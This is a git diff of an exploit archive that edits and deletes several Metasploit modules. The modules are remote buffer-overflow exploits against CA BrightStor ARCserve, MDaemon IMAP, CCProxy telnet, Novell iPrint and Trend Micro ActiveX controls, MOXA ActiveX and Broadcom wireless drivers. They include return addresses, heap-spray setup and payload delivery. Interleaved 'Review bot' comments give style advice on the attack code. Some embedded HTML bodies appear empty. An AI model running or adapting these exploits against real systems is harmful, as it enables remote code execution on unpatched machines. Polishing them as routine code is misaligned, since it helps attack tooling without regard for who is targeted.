- end - - print_status("Completed sending beacons.") - end - - -# -# The following research was provided by Gil Dabah of ZERT -# -# The long rates field bug can be triggered three different ways (at least): -# 1) Send a single rates IE with valid rates up front and long data -# 2) Send a single rates IE field with valid rates, follow with IE type 0x32 with long data -# 3) Send two IE rates fields, with the second one containing the long data (this exploit) -# - - def create_beacon - - ssid = rand_text_alphanumeric(6) - bssid = ("\x00" * 2) + rand_text(4) - src = ("\x90" * 4) + "\xeb\x2b" - seq = [rand(255)].pack('n') - - buff = rand_text(75) - buff[0, 2] = "\xeb\x49" - buff[71, 4] = [target.ret].pack('V') - - frame = - "\x80" + # type/subtype - "\x00" + # flags - "\x00\x00" + # duration - eton(datastore['ADDR_DST']) + # dst - src + # src - bssid + # bssid - seq + # seq - rand_text(8) + # timestamp value - "\x64\x00" + # beacon interval - "\x00\x05" + # capability flags - - # ssid tag - "\x00" + ssid.length.chr + ssid + - - # supported rates - "\x01" + "\x08" + "\x82\x84\x8b\x96\x0c\x18\x30\x48" + - - # current channel - "\x03" + "\x01" + channel.chr + - - # eip was his name-o - "\x01" + buff.length.chr + buff + - - payload.encoded - - return frame - end - -end diff --git a/platforms/windows/remote/16417.rb b/platforms/windows/remote/16417.rb index d5fcbe8fa..d0623107e 100755 --- a/platforms/windows/remote/16417.rb +++ b/platforms/windows/remote/16417.rb 
@@ -1,89 +1,84 @@ -## -# $Id: tape_engine_8A.rb 10551 2010-10-05 12:38:46Z swtornio $ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# web site for more information on licensing and terms of use. +# http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote - Rank = AverageRanking + Rank = AverageRanking - include Msf::Exploit::Remote::DCERPC + include Msf::Exploit::Remote::DCERPC - def initialize(info = {}) - super(update_info(info, - 'Name' => 'CA BrightStor ARCserve Tape Engine 0x8A Buffer Overflow', - 'Description' => %q{ - This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup - r11.1 - r11.5. By sending a specially crafted DCERPC request, an attacker could overflow - the buffer and execute arbitrary code. - }, - 'Author' => [ 'MC' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision: 10551 $', - 'References' => - [ - [ 'OSVDB', '68330'], - [ 'URL', 'http://www.metasploit.com/users/mc' ], - ], - 'Privileged' => true, - 'DefaultOptions' => - { - 'EXITFUNC' => 'thread', - }, - 'Payload' => - { - 'Space' => 500, - 'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e", - 'StackAdjustment' => -3500, - }, - 'Platform' => 'win', - 'Targets' => - [ - [ 'BrightStor ARCserve r11.5/Windows 2003', { 'Ret' => 0x28eb6493 } ], - ], - 'DisclosureDate' => 'Oct 4 2010', - 'DefaultTarget' => 0)) + def initialize(info = {}) + super(update_info(info, + 'Name' => 'CA BrightStor ARCserve Tape Engine 0x8A Buffer Overflow', + 'Description' => %q{ + This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup + r11.1 - r11.5. By sending a specially crafted DCERPC request, an attacker could overflow + the buffer and execute arbitrary code. 
+ }, + 'Author' => [ 'MC' ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'OSVDB', '68330'], + [ 'URL', 'http://www.metasploit.com/users/mc' ], + ], + 'Privileged' => true, + 'DefaultOptions' => + { + 'EXITFUNC' => 'thread', + }, + 'Payload' => + { + 'Space' => 500, + 'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e", + 'StackAdjustment' => -3500, + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'BrightStor ARCserve r11.5/Windows 2003', { 'Ret' => 0x28eb6493 } ], + ], + 'DisclosureDate' => 'Oct 4 2010', + 'DefaultTarget' => 0)) - register_options([ Opt::RPORT(6502) ], self.class) - end + register_options([ Opt::RPORT(6502) ], self.class) + end - def exploit + def exploit - connect + connect - handle = dcerpc_handle('62b93df0-8b02-11ce-876c-00805f842837', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']]) - print_status("Binding to #{handle} ...") + handle = dcerpc_handle('62b93df0-8b02-11ce-876c-00805f842837', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']]) + print_status("Binding to #{handle} ...") - dcerpc_bind(handle) - print_status("Bound to #{handle} ...") + dcerpc_bind(handle) + print_status("Bound to #{handle} ...") - request = "\x00\x04\x08\x0c\x05\x00\x00\x00\x00\x00" - request << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + request = "\x00\x04\x08\x0c\x05\x00\x00\x00\x00\x00" + request << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" - dcerpc.call(0x2B, request) + dcerpc.call(0x2B, request) - sploit = NDR.long(4) - sploit << NDR.string(rand_text_alpha_upper(1002) + [target.ret].pack('V') + payload.encoded + "\x00") + sploit = NDR.long(4) + sploit << NDR.string(rand_text_alpha_upper(1002) + [target.ret].pack('V') + payload.encoded + "\x00") - print_status("Trying target #{target.name}...") + print_status("Trying target #{target.name}...") - begin - dcerpc_call(0x8A, sploit) - rescue Rex::Proto::DCERPC::Exceptions::NoResponse - end + begin + dcerpc_call(0x8A, sploit) + rescue Rex::Proto::DCERPC::Exceptions::NoResponse + end - handler - disconnect + handler + 
disconnect - end + end end =begin @@ -94,4 +89,4 @@ long sub_100707D0 ( [in] long arg_2, [in][ref][string] char * arg_3 ); -=end +=end \ No newline at end of file diff --git a/platforms/windows/remote/16477.rb b/platforms/windows/remote/16477.rb deleted file mode 100755 index b1713fb09..000000000 --- a/platforms/windows/remote/16477.rb +++ /dev/null 
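Review bot: The second hunk of this file drops the final newline after `=end` (the new side ends with `\ No newline at end of file`), and 16685.rb in this commit does the same after its closing `end`; both should keep a trailing newline, since the rest of the change is a pure reindent. The first hunk also keeps `class Metasploit3 < Msf::Exploit::Remote` and the old license header, while 16685.rb is moved to `class MetasploitModule` with the new "This module requires Metasploit" header — presumably intentional, but the two modernisations look inconsistent within one commit. The `rescue Rex::Proto::DCERPC::Exceptions::NoResponse` block in `exploit` still swallows the exception with no explanation; a one-liner such as `# NoResponse is expected after this call -- TODO confirm why` would tell the next reader it is deliberate.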
@@ -1,83 +0,0 @@ -## -# $Id: mdaemon_cram_md5.rb 9583 2010-06-22 19:11:05Z todb $ -## - -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ -## - -require 'msf/core' - -class Metasploit3 < Msf::Exploit::Remote - Rank = GreatRanking - - include Msf::Exploit::Remote::Imap - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Mdaemon 8.0.3 IMAPD CRAM-MD5 Authentication Overflow', - 'Description' => %q{ - This module exploits a buffer overflow in the CRAM-MD5 - authentication of the MDaemon IMAP service. This - vulnerability was discovered by Muts. - }, - 'Author' => [ 'anonymous' ], - 'License' => BSD_LICENSE, - 'Version' => '$Revision: 9583 $', - 'References' => - [ - [ 'CVE', '2004-1520'], - [ 'OSVDB', '11838'], - [ 'BID', '11675'], - ], - 'Privileged' => true, - 'DefaultOptions' => - { - 'EXITFUNC' => 'process', - }, - 'Payload' => - { - 'Space' => 500, - 'BadChars' => "\x00", - 'StackAdjustment' => -3500, - }, - 'Platform' => 'win', - 'Targets' => - [ - [ 'MDaemon IMAP 8.0.3 Windows XP SP2', { } ], - ], - 'DisclosureDate' => 'Nov 12 2004', - 'DefaultTarget' => 0)) - end - - def exploit - connect - - print_status("Asking for CRAM-MD5 authentication...") - sock.put("a001 authenticate cram-md5\r\n") - res = sock.get_once - - - print_status("Received CRAM-MD5 answer: #{res.chomp}") - # Magic no return-address exploitation ninjaness! 
- buf = 'AAAA' + payload.encoded + make_nops(258) + "\xe9\x05\xfd\xff\xff" - req = Rex::Text.encode_base64(buf) + "\r\n" - sock.put(req) - res = sock.get_once - - print_status("Received authentication reply: #{res.chomp}") - print_status("Sending LOGOUT to close the thread and trigger an exception") - sock.put("a002 LOGOUT\r\n") - res = sock.get_once - - print_status("Received LOGOUT reply: #{res.chomp}") - select(nil,nil,nil,1) - - handler - disconnect - end - -end diff --git a/platforms/windows/remote/16501.rb b/platforms/windows/remote/16501.rb deleted file mode 100755 index 879303bce..000000000 --- a/platforms/windows/remote/16501.rb +++ /dev/null 
@@ -1,154 +0,0 @@ -## -# $Id: novelliprint_callbackurl.rb 10429 2010-09-21 18:46:29Z jduck $ -## - -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ -## - -## -# novelliprint_callbackurl.rb -# -# Novell iPrint Client ActiveX Control call-back-url Buffer Overflow exploit for the Metasploit Framework -# -# Exploit successfully tested on the following platforms: -# - Novell iPrint Client 5.40 on Internet Explorer 7, Windows XP SP3 -# - Novell iPrint Client 5.42 on Internet Explorer 7, Windows XP SP3 -# - Novell iPrint Client 5.42 on Internet Explorer 7, Windows Vista SP2 -# -# ienipp.ocx version tested: -# File Version: 5.4.0.0 and 5.4.2.0 -# ClassID: 36723F97-7AA0-11D4-8919-FF2D71D0D32C -# RegKey Safe for Script: True -# RegKey Safe for Init: True -# KillBitSet: False -# -# References: -# - CVE-2010-1527 -# - OSVDB 67411 -# - http://secunia.com/secunia_research/2010-104/ - Original advisory by Carsten Eiram, Secunia Research -# - http://www.exploit-db.com/exploits/15042/ - MOAUB #19 exploit -# - http://www.exploit-db.com/moaub-19-novell-iprint-client-browser-plugin-call-back-url-stack-overflow/ - MOAUB #14 binary analysis -# - http://www.rec-sec.com/2010/09/21/novell-iprint-callbackurl-buffer-overflow-exploit/ - Metasploit exploit by Trancer, Recognize-Security -# -# Trancer -# http://www.rec-sec.com -## - -require 'msf/core' - -class Metasploit3 < Msf::Exploit::Remote - Rank = NormalRanking - - include Msf::Exploit::Remote::HttpServer::HTML - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Novell iPrint Client ActiveX Control call-back-url Buffer Overflow', - 'Description' => %q{ - This module exploits a stack-based buffer overflow in Novell iPrint Client 5.42. 
- When sending an overly long string to the 'call-back-url' parameter in an - op-client-interface-version action of ienipp.ocx an attacker may be able to - execute arbitrary code. - }, - 'License' => MSF_LICENSE, - 'Author' => [ 'Trancer '$Revision: 10429 $', - 'References' => - [ - [ 'CVE', '2010-1527' ], - [ 'OSVDB', '67411'], - [ 'URL', 'http://secunia.com/secunia_research/2010-104/' ], # Carsten Eiram, Secunia Research - [ 'URL', 'http://www.exploit-db.com/exploits/15042/' ], # MOAUB #19 - ], - 'DefaultOptions' => - { - 'EXITFUNC' => 'process', - }, - 'Payload' => - { - 'Space' => 1024, - 'BadChars' => "\x00", - }, - 'Platform' => 'win', - 'Targets' => - [ - [ 'Windows XP SP0-SP2 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0A0A0A0A } ] - ], - 'DisclosureDate' => 'Aug 20 2010', - 'DefaultTarget' => 0)) - end - - def autofilter - false - end - - def check_dependencies - use_zlib - end - - def on_request_uri(cli, request) - # Re-generate the payload. - return if ((p = regenerate_payload(cli)) == nil) - - # Encode the shellcode. 
- shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) - - # Setup exploit buffers - nops = Rex::Text.to_unescape([target.ret].pack('V')) - ret = [target.ret].pack('V') - ret = ret * 250 - blocksize = 0x40000 - fillto = 500 - offset = target['Offset'] - - # ActiveX parameters - clsid = "36723F97-7AA0-11D4-8919-FF2D71D0D32C" - - # Randomize the javascript variable names - ienipp = rand_text_alpha(rand(100) + 1) - j_shellcode = rand_text_alpha(rand(100) + 1) - j_nops = rand_text_alpha(rand(100) + 1) - j_ret = rand_text_alpha(rand(100) + 1) - j_headersize = rand_text_alpha(rand(100) + 1) - j_slackspace = rand_text_alpha(rand(100) + 1) - j_fillblock = rand_text_alpha(rand(100) + 1) - j_block = rand_text_alpha(rand(100) + 1) - j_memory = rand_text_alpha(rand(100) + 1) - j_counter = rand_text_alpha(rand(30) + 2) - - html = %Q| - - - - - - -| - - print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...") - - # Transmit the response to the client - send_response(cli, html, { 'Content-Type' => 'text/html' }) - - # Handle the payload - handler(cli) - end - -end diff --git a/platforms/windows/remote/16596.rb b/platforms/windows/remote/16596.rb deleted file mode 100755 index cf43c48cb..000000000 --- a/platforms/windows/remote/16596.rb +++ /dev/null 
@@ -1,147 +0,0 @@ -## -# $Id: trendmicro_extsetowner.rb 10538 2010-10-04 04:26:09Z jduck $ -## - -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ -## - -## -# trendmicro_extsetowner.rb -# -# Trend Micro Internet Security Pro 2010 ActiveX extSetOwner() Remote Code Execution exploit for the Metasploit Framework -# -# Exploit successfully tested on the following platforms: -# - Trend Micro Internet Security Pro 2010 on Internet Explorer 7, Windows XP SP3 -# - Trend Micro Internet Security Pro 2010 on Internet Explorer 7, Windows Vista SP2 -# -# UfPBCtrl.dll version tested: -# File Version: 17.50.0.1366 -# ClassID: 15DBC3F9-9F0A-472E-8061-043D9CEC52F0 -# RegKey Safe for Script: True -# RegKey Safe for Init: True -# KillBitSet: False -# -# References: -# - CVE-2010-3189 -# - OSVDB 67561 -# - http://www.zerodayinitiative.com/advisories/ZDI-10-165/ - Original advisory by Andrea Micalizzi aka rgod via Zero Day Initiative -# - http://www.exploit-db.com/exploits/14878/ - MOAUB #03 exploit -# - http://www.exploit-db.com/trend-micro-internet-security-pro-2010-activex-extsetowner-remote-code-execution/ - MOAUB #03 binary analysis -# - http://www.rec-sec.com/2010/09/28/trend-micro-internet-security-2010-rce-exploit/ - Metasploit exploit by Trancer, Recognize-Security -# -# Trancer -# http://www.rec-sec.com -## - -require 'msf/core' - -class Metasploit3 < Msf::Exploit::Remote - Rank = NormalRanking - - include Msf::Exploit::Remote::HttpServer::HTML - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Trend Micro Internet Security Pro 2010 ActiveX extSetOwner() Remote Code Execution', - 'Description' => %q{ - This module exploits a remote code execution vulnerability in Trend Micro - Internet Security Pro 2010 ActiveX. 
- When sending an invalid pointer to the extSetOwner() function of UfPBCtrl.dll - an attacker may be able to execute arbitrary code. - }, - 'License' => MSF_LICENSE, - 'Author' => [ 'Trancer '$Revision: 10538 $', - 'References' => - [ - [ 'CVE', '2010-3189' ], - [ 'OSVDB', '67561'], - [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-10-165/' ], # Andrea Micalizzi aka rgod via Zero Day Initiative - [ 'URL', 'http://www.exploit-db.com/exploits/14878/' ], # MOAUB #03 - ], - 'DefaultOptions' => - { - 'EXITFUNC' => 'process', - }, - 'Payload' => - { - 'Space' => 1024, - 'BadChars' => "\x00", - }, - 'Platform' => 'win', - 'Targets' => - [ - [ 'Windows XP SP0-SP2 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x00C750A1 } ] #?? - ], - 'DisclosureDate' => 'Aug 25 2010', - 'DefaultTarget' => 0)) - end - - def autofilter - false - end - - def check_dependencies - use_zlib - end - - def on_request_uri(cli, request) - # Re-generate the payload. - return if ((p = regenerate_payload(cli)) == nil) - - # Encode the shellcode. 
- shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) - - # Setup exploit buffers - nops = Rex::Text.to_unescape(make_nops(4)) - ret = Rex::Text.to_unescape([target.ret].pack('V')) - blocksize = 0x40000 - fillto = 500 - - # ActiveX parameters - clsid = "15DBC3F9-9F0A-472E-8061-043D9CEC52F0" - - # Randomize the javascript variable names - ufpbctrl = rand_text_alpha(rand(100) + 1) - j_shellcode = rand_text_alpha(rand(100) + 1) - j_nops = rand_text_alpha(rand(100) + 1) - j_ret = rand_text_alpha(rand(100) + 1) - j_headersize = rand_text_alpha(rand(100) + 1) - j_slackspace = rand_text_alpha(rand(100) + 1) - j_fillblock = rand_text_alpha(rand(100) + 1) - j_block = rand_text_alpha(rand(100) + 1) - j_memory = rand_text_alpha(rand(100) + 1) - j_counter = rand_text_alpha(rand(30) + 2) - - html = %Q| - - -| - - print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...") - - # Transmit the response to the client - send_response(cli, html, { 'Content-Type' => 'text/html' }) - - # Handle the payload - handler(cli) - end -end diff --git a/platforms/windows/remote/16685.rb b/platforms/windows/remote/16685.rb index ff969fed8..1c90f74b3 100755 --- a/platforms/windows/remote/16685.rb +++ b/platforms/windows/remote/16685.rb 
@@ -1,85 +1,79 @@ ## -# $Id: moxa_mediadbplayback.rb 10914 2010-11-05 02:58:01Z swtornio $ -## - -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote - Rank = AverageRanking + Rank = AverageRanking - include Msf::Exploit::FILEFORMAT + include Msf::Exploit::FILEFORMAT - def initialize(info = {}) - super(update_info(info, - 'Name' => 'MOXA MediaDBPlayback ActiveX Control Buffer Overflow', - 'Description' => %q{ - This module exploits a stack buffer overflow in MOXA_ActiveX_SDK. When - sending an overly long string to the PlayFileName() of MediaDBPlayback.DLL (2.2.0.5) - an attacker may be able to execute arbitrary code. - }, - 'License' => MSF_LICENSE, - 'Author' => [ 'MC' ], - 'Version' => '$Revision: 10914 $', - 'References' => - [ - [ 'OSVDB', '68986'], - [ 'URL', 'http://www.moxa.com' ], - ], - 'DefaultOptions' => - { - 'EXITFUNC' => 'process', - 'DisablePayloadHandler' => 'true', - }, - 'Payload' => - { - 'Space' => 1024, - 'BadChars' => "\x00", - }, - 'Platform' => 'win', - 'Targets' => - [ - [ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0a0a0a0a } ] - ], - 'DisclosureDate' => 'Oct 19 2010', - 'DefaultTarget' => 0)) + def initialize(info = {}) + super(update_info(info, + 'Name' => 'MOXA MediaDBPlayback ActiveX Control Buffer Overflow', + 'Description' => %q{ + This module exploits a stack buffer overflow in MOXA_ActiveX_SDK. When + sending an overly long string to the PlayFileName() of MediaDBPlayback.DLL (2.2.0.5) + an attacker may be able to execute arbitrary code. 
+ }, + 'License' => MSF_LICENSE, + 'Author' => [ 'MC' ], + 'References' => + [ + [ 'CVE', '2010-4742' ], + [ 'OSVDB', '68986'], + [ 'URL', 'http://www.moxa.com' ], + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'process', + 'DisablePayloadHandler' => 'true', + }, + 'Payload' => + { + 'Space' => 1024, + 'BadChars' => "\x00", + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0a0a0a0a } ] + ], + 'DisclosureDate' => 'Oct 19 2010', + 'DefaultTarget' => 0)) - register_options( - [ - OptString.new('FILENAME', [ false, 'The file name.', 'msf.html']), - ], self.class) - end + register_options( + [ + OptString.new('FILENAME', [ false, 'The file name.', 'msf.html']), + ], self.class) + end - def exploit - # Encode the shellcode. - shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) + def exploit + # Encode the shellcode. + shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) - # Create some nops. - nops = Rex::Text.to_unescape(make_nops(4)) + # Create some nops. + nops = Rex::Text.to_unescape(make_nops(4)) - # Set the return. - ret = Rex::Text.uri_encode([target.ret].pack('L')) + # Set the return. + ret = Rex::Text.uri_encode([target.ret].pack('L')) - # Randomize the javascript variable names. - vname = rand_text_alpha(rand(100) + 1) - var_i = rand_text_alpha(rand(30) + 2) - rand1 = rand_text_alpha(rand(100) + 1) - rand2 = rand_text_alpha(rand(100) + 1) - rand3 = rand_text_alpha(rand(100) + 1) - rand4 = rand_text_alpha(rand(100) + 1) - rand5 = rand_text_alpha(rand(100) + 1) - rand6 = rand_text_alpha(rand(100) + 1) - rand7 = rand_text_alpha(rand(100) + 1) - rand8 = rand_text_alpha(rand(100) + 1) + # Randomize the javascript variable names. 
+ vname = rand_text_alpha(rand(100) + 1) + var_i = rand_text_alpha(rand(30) + 2) + rand1 = rand_text_alpha(rand(100) + 1) + rand2 = rand_text_alpha(rand(100) + 1) + rand3 = rand_text_alpha(rand(100) + 1) + rand4 = rand_text_alpha(rand(100) + 1) + rand5 = rand_text_alpha(rand(100) + 1) + rand6 = rand_text_alpha(rand(100) + 1) + rand7 = rand_text_alpha(rand(100) + 1) + rand8 = rand_text_alpha(rand(100) + 1) - content = %Q| + content = %Q| - | + | - print_status("Creating '#{datastore['FILENAME']}' file ...") + print_status("Creating '#{datastore['FILENAME']}' file ...") - file_create(content) - end + file_create(content) + end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16689.rb b/platforms/windows/remote/16689.rb deleted file mode 100755 index 13deb72e4..000000000 --- a/platforms/windows/remote/16689.rb +++ /dev/null 
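Review bot: `ret = Rex::Text.uri_encode([target.ret].pack('L'))` in `exploit` packs the return address with `'L'`, which is native-endian, whereas every other module touched by this commit (16417.rb, 2770.rb, 2771.rb) uses `pack('V')` for the same value, and the reindent leaves that inconsistency in place. Unless native byte order is intended, `ret = Rex::Text.uri_encode([target.ret].pack('V'))` makes it explicit and independent of the host that generates the file. The `content = %Q| |` body also appears empty in this rendering — probably lost in extraction rather than in the commit, but worth checking against the real file. The new side additionally ends with `\ No newline at end of file` after the closing `end`; keep the trailing newline.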
@@ -1,87 +0,0 @@ -## -# $Id: ccproxy_telnet_ping.rb 9179 2010-04-30 08:40:19Z jduck $ -## - -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ -## - -require 'msf/core' - -class Metasploit3 < Msf::Exploit::Remote - Rank = AverageRanking - - include Msf::Exploit::Remote::Tcp - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'CCProxy <= v6.2 Telnet Proxy Ping Overflow', - 'Description' => %q{ - This module exploits the YoungZSoft CCProxy <= v6.2 suite - Telnet service. The stack is overwritten when sending an overly - long address to the 'ping' command. - }, - 'Author' => [ 'Patrick Webster ' ], - 'Arch' => [ ARCH_X86 ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision: 9179 $', - 'References' => - [ - [ 'CVE', '2004-2416' ], - [ 'OSVDB', '11593' ], - [ 'BID', '11666 ' ], - [ 'URL', 'http://milw0rm.com/exploits/621' ], - ], - 'Privileged' => false, - 'DefaultOptions' => - { - 'EXITFUNC' => 'thread', - }, - 'Payload' => - { - 'Space' => 1012, - 'BadChars' => "\x00\x07\x08\x0a\x0d\x20", - }, - 'Platform' => ['win'], - 'Targets' => - [ - # Patrick - Tested OK 2007/08/19. W2K SP0, W2KSP4, XP SP0, XP SP2 EN. 
- [ 'Windows 2000 Pro All - English', { 'Ret' => 0x75023411 } ], # call esi ws2help.dll - [ 'Windows 2000 Pro All - Italian', { 'Ret' => 0x74fd2b81 } ], # call esi ws2help.dll - [ 'Windows 2000 Pro All - French', { 'Ret' => 0x74fa2b22 } ], # call esi ws2help.dll - [ 'Windows XP SP0/1 - English', { 'Ret' => 0x71aa1a97 } ], # call esi ws2help.dll - [ 'Windows XP SP2 - English', { 'Ret' => 0x71aa1b22 } ], # call esi ws2help.dll - ], - 'DisclosureDate' => 'Nov 11 2004')) - - register_options( - [ - Opt::RPORT(23), - ], self.class) - end - - def check - connect - banner = sock.get_once(-1,3) - disconnect - - if (banner =~ /CCProxy Telnet Service Ready/) - return Exploit::CheckCode::Appears - end - return Exploit::CheckCode::Safe - end - - def exploit - connect - - sploit = "p " + payload.encoded + [target['Ret']].pack('V') + make_nops(7) - sock.put(sploit + "\r\n") - - handler - disconnect - end - -end diff --git a/platforms/windows/remote/2770.rb b/platforms/windows/remote/2770.rb index 733d3d7de..8e74910e8 100755 --- a/platforms/windows/remote/2770.rb +++ b/platforms/windows/remote/2770.rb 
@@ -1,81 +1,90 @@ +## +# $Id: broadcom_wifi_ssid.rb 9669 2010-07-03 03:13:45Z jduck $ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + require 'msf/core' -module Msf +class Metasploit3 < Msf::Exploit::Remote + Rank = LowRanking -class Exploits::Windows::Driver::Broadcom_WiFi_SSID < Msf::Exploit::Remote - - include Exploit::Lorcon - include Exploit::KernelMode + include Msf::Exploit::Lorcon2 + include Msf::Exploit::KernelMode def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Broadcom Wireless Driver Probe Response SSID Overflow', 'Description' => %q{ - This module exploits a stack overflow in the Broadcom Wireless driver - that allows remote code execution in kernel mode by sending a 802.11 probe - response that contains a long SSID. The target MAC address must - be provided to use this exploit. The two cards tested fell into the - 00:14:a5:06:XX:XX and 00:14:a4:2a:XX:XX ranges. + This module exploits a stack buffer overflow in the Broadcom Wireless driver + that allows remote code execution in kernel mode by sending a 802.11 probe + response that contains a long SSID. The target MAC address must + be provided to use this exploit. The two cards tested fell into the + 00:14:a5:06:XX:XX and 00:14:a4:2a:XX:XX ranges. - This module depends on the Lorcon library and only works on the Linux platform - with a supported wireless card. Please see the Ruby Lorcon documentation - (external/ruby-lorcon/README) for more information. + This module depends on the Lorcon2 library and only works on the Linux platform + with a supported wireless card. Please see the Ruby Lorcon2 documentation + (external/ruby-lorcon/README) for more information. 
}, - - 'Authors' => + 'Author' => [ 'Chris Eagle', # initial discovery - 'Johnny Cache ', # the man with the plan + 'Johnny Cache ', # the man with the plan 'skape', # windows kernel ninjitsu and debugging 'hdm' # porting the C version to ruby ], 'License' => MSF_LICENSE, - 'Version' => '$Revision: 3583 $', + 'Version' => '$Revision: 9669 $', 'References' => [ + ['CVE', '2006-5882'], + ['OSVDB', '30294'], ['URL', 'http://projects.info-pull.com/mokb/MOKB-11-11-2006.html'], ], 'Privileged' => true, - 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, - 'Payload' => { 'Space' => 500 }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ # 5.1.2600.2622 (xpsp_sp2_gdr.050301-1519) [ 'Windows XP SP2 (5.1.2600.2122), bcmwl5.sys 3.50.21.10', { 'Ret' => 0x8066662c, # jmp edi 'Platform' => 'win', - 'Payload' => + 'Payload' => { - 'ExtendedOptions' => + 'ExtendedOptions' => { 'Stager' => 'sud_syscall_hook', 'PrependUser' => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500 'Recovery' => 'idlethread_restart', - 'KiIdleLoopAddress' => 0x804dbb27, - + 'KiIdleLoopAddress' => 0x804dbb27, + } } - } + } ], - + # 5.1.2600.2180 (xpsp_sp2_rtm_040803-2158) [ 'Windows XP SP2 (5.1.2600.2180), bcmwl5.sys 3.50.21.10', { 'Ret' => 0x804f16eb, # jmp edi 'Platform' => 'win', - 'Payload' => + 'Payload' => { - 'ExtendedOptions' => + 'ExtendedOptions' => { 'Stager' => 'sud_syscall_hook', 'PrependUser' => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500 @@ -83,13 +92,13 @@ class Exploits::Windows::Driver::Broadcom_WiFi_SSID < Msf::Exploit::Remote 'KiIdleLoopAddress' => 0x804dc0c7, } } - } - ] + } + ] ], - - 'DefaultTarget' => 0 + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Nov 11 2006' )) - + register_options( [ OptString.new('ADDR_DST', [ true, "The MAC address of the target system",'FF:FF:FF:FF:FF:FF']), 
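Review bot: `'Version' => '$Revision: 9669 $'` is updated rather than removed in this hunk, and the new header block adds a `$Id: broadcom_wifi_ssid.rb ...` keyword line, whereas 16417.rb and 16685.rb in the same commit drop the `'Version'` key (16685.rb drops the `$Id:` header too); the first hunk of 2771.rb does the same as this one. If the intent is to sync each module with upstream at a different revision that is fine, but otherwise the keyword lines should be handled the same way in all four files. The added `['CVE', '2006-5882']` and `['OSVDB', '30294']` references and the `'DisclosureDate'` key are the substantive part of the hunk and look correct against the MOKB URL already listed.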
@@ -99,102 +108,99 @@ class Exploits::Windows::Driver::Broadcom_WiFi_SSID < Msf::Exploit::Remote def exploit open_wifi - + stime = Time.now.to_i - + print_status("Sending beacons and responses for #{datastore['RUNTIME']} seconds...") - - while (stime + datastore['RUNTIME'].to_i > Time.now.to_i) - + + while (stime + datastore['RUNTIME'].to_i > Time.now.to_i) + select(nil, nil, nil, 0.02) wifi.write(create_response) select(nil, nil, nil, 0.01) wifi.write(create_beacon) - + break if session_created? - + end - + print_status("Finished sending frames...") end - + def create_beacon src = eton('90:e9:75:00:00:00') #relative jmp + 0x75 = stage2 HaHa. Tuned for ssid len = 93 dst = eton('FF:FF:FF:FF:FF:FF') seq = [Time.now.to_i % 4096].pack('n') - + blob = create_frame blob[0,1] = 0x80.chr blob[4,6] = dst blob[10,6] = src blob[16,6] = src blob[22,2] = seq - + blob end - + def create_response src = eton('90:e9:75:00:00:00') #relative jmp + 0x75 = stage2 HaHa. Tuned for ssid len = 93 dst = eton(datastore['ADDR_DST']) seq = [Time.now.to_i % 256].pack('n') - + blob = create_frame - blob[0,1] = 0x50.chr + blob[0,1] = 0x50.chr blob[4,6] = dst blob[10,6] = src - blob[16,6] = src # bssid field, good idea to set to src. + blob[16,6] = src # bssid field, good idea to set to src. 
